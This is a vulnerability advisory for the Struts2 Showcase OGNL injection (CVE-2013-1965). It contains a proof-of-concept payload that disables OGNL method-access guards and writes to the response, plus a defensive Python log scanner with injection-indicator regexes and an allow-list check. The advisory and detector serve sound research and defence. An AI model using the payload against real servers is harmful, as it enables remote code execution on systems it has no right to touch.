Apache Struts2 Showcase Application Remote Command Execution Vulnerability (CVE-2013-1965)

Affected systems:
Apache Struts Showcase App 2.0.0 - 2.3.13
Description:
CVE(CAN) ID: CVE-2013-1965

Struts2 is a second-generation Java enterprise web application framework based on the Model-View-Controller (MVC) pattern. It is the product of the merger of the WebWork and Struts communities.

Apache Struts2 Showcase App 2.0.0 through 2.3.13 contains a security vulnerability that can lead to arbitrary code execution.

<*Source: Xgc Kxlzx Links: http://secunia.com/advisories/53495/ http://struts.apache.org/development/2.x/docs/s2-012.html http://struts.apache.org/development/2.x/docs/s2-013.html http://www.freebuf.com/vuls/9757.html http://struts.apache.org/development/2.x/docs/security-bulletins.html https://cwiki.apache.org/confluence/display/WW/S2-012 *>

Test method:
Warning

The following program (method) may be offensive in nature and is provided solely for security research and teaching purposes. Users assume all risk!

Proof of concept
Run struts2-showcase
Open url: http://localhost:8080/struts2-showcase/skill/edit.action?skillName=SPRING-DEV
Set the skill name to a %{expr} expression, for example:
%{(#_memberAccess[‘allowStaticMethodAccess’]=true)(#context[‘xwork.MethodAccessor.denyMethodExecution’]=false) #hackedbykxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#hackedbykxlzx.println(‘hacked by kxlzx’),#hackedbykxlzx.close())}
submit the form
For the issue to work, a redirect result must be defined as follows:


edit.action?skillName=${currentSkill.name}
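The advisory above names the indicators a defender can key on: an OGNL expression wrapper (%{...} or ${...}) arriving in a request parameter such as skillName, tampering with #_memberAccess or the xwork.MethodAccessor.denyMethodExecution flag, and static method invocation through the @class@method syntax. The following Python script is an added example, not part of this advisory or of the Struts project: it scans constructed Apache-style access log lines for those indicators (URL-decoding twice, because such payloads are routinely double-encoded) and also shows the allow-list check an action should apply to a parameter like skillName before it is ever reflected into a result configuration. The log lines, the skill-name policy and the function names are all assumptions made for the demo.

```python
import re
from urllib.parse import unquote, urlsplit

# Indicators of OGNL expression injection, taken from the advisory text on
# this page (S2-012 / S2-013). Each entry is (indicator name, regex).
OGNL_INDICATORS = [
    ("expression_wrapper", re.compile(r"[%$]\{")),
    ("member_access_tamper", re.compile(r"#_memberAccess")),
    ("deny_method_execution_tamper",
     re.compile(r"xwork\.MethodAccessor\.denyMethodExecution")),
    ("static_method_call", re.compile(r"@[\w.]+@\w+")),
]

# Assumed allow-list policy for a skill name: letters, digits, '-' and '_',
# at most 64 characters. This is a demo policy, not Struts' own validation.
SKILL_NAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")

# Apache combined log prefix: ip ident user [timestamp] "METHOD target PROTO" status
LOG_LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample log lines (not real traffic). Line 2 carries a URL-encoded
# %{(#_memberAccess['allowStaticMethodAccess']=true)} fragment, line 3 a ${foo}
# wrapper, line 4 is unparsable noise.
LOG_SAMPLE = [
    '10.0.0.5 - - [23/May/2013:10:01:02 +0000] "GET /struts2-showcase/skill/'
    'edit.action?skillName=SPRING-DEV HTTP/1.1" 200 1532',
    '10.0.0.9 - - [23/May/2013:10:01:07 +0000] "GET /struts2-showcase/skill/'
    'edit.action?skillName=%25%7B%28%23_memberAccess%5B%27allowStaticMethodAccess'
    '%27%5D%3Dtrue%29%7D HTTP/1.1" 302 0',
    '10.0.0.9 - - [23/May/2013:10:01:09 +0000] "GET /struts2-showcase/skill/'
    'edit.action?skillName=%24%7Bfoo%7D HTTP/1.1" 200 1532',
    'garbage line that does not match the log format',
]


def is_valid_skill_name(value):
    """Mitigation side: accept only values matching the strict allow-list.
    Anything containing %{, ${, '#', '@' or quotes is rejected outright."""
    return bool(SKILL_NAME_RE.match(value))


def find_ognl_indicators(raw_value):
    """Return the names of the indicators present in a raw query value.
    Decode twice so that both single- and double-encoded payloads are caught."""
    decoded = unquote(unquote(raw_value))
    return [name for name, rx in OGNL_INDICATORS if rx.search(decoded)]


def scan_access_log(lines):
    """Detection side: walk access log lines and report every query parameter
    whose value carries at least one OGNL injection indicator."""
    findings = []
    for line in lines:
        m = LOG_LINE_RE.match(line)
        if not m:
            continue  # not a log line we understand; skip rather than crash
        query = urlsplit(m.group("target")).query
        for pair in query.split("&"):
            if not pair:
                continue
            name, _, value = pair.partition("=")
            hits = find_ognl_indicators(value)
            if hits:
                findings.append({
                    "ip": m.group("ip"),
                    "ts": m.group("ts"),
                    "param": name,
                    "indicators": hits,
                })
    return findings


if __name__ == "__main__":
    for f in scan_access_log(LOG_SAMPLE):
        print(f"{f['ts']} {f['ip']} param={f['param']} indicators={f['indicators']}")
    print("SPRING-DEV valid:", is_valid_skill_name("SPRING-DEV"))
    print("%{1+1} valid:", is_valid_skill_name("%{1+1}"))
```

Run against the constructed sample, the scanner flags the two requests from 10.0.0.9 and ignores the benign SPRING-DEV request and the malformed line. The allow-list check is the application-side counterpart: because the redirect result re-evaluates ${currentSkill.name}, the only safe values for skillName are ones that can never contain expression syntax, which a strict character allow-list guarantees without needing to enumerate payload shapes. Upgrading to the version linked in the vendor patch section remains the actual fix.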

Recommendations:
Vendor patch:

Apache
——
The vendor has released an upgrade patch to fix this security issue; please download it from the vendor's homepage:

http://struts.apache.org/download.cgi#struts23141